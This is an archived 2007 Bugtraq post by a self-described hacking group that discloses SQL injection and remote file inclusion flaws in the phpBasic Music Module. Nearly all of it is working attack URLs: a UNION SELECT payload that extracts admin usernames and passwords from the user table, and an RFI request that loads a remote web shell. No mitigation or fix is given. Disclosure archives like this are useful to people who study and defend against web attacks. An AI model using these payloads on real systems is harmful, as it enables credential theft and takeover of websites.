lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20071023165928.7000.qmail@securityfocus.com>
Date: 23 Oct 2007 16:59:28 -0000
From: pete.houston.17187@...il.com
To: bugtraq@...urityfocus.com
Subject: [Vulz]  PHP Basic Multiple Vulnerabilities by Xcross87 & Alucar

Software : phpBasic Music Module
Homepage : http://phpbasic.com/

1. SQL Injection by Xcross87 :
Proof of concept :
http://victim.com/phpbasic/?php=music&basic=view&id='[SQL Injection]
Xploit admin user account :
http://victim.com/phpbasic/?php=music&basic=view&id=1+union+select+0,1,user_name,3,user_pass,5,6,7,8,9+from+php_user/*%20%3C+

2. RFI by Alucar

Xploit :
http://victim.com/phpbasic/includes.php?root=[HCE_Shell]

=== ..::Xcross87::.. | ..::Alucar::.. | HCETeam Xploiter | HCEGroup.Vn ===

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ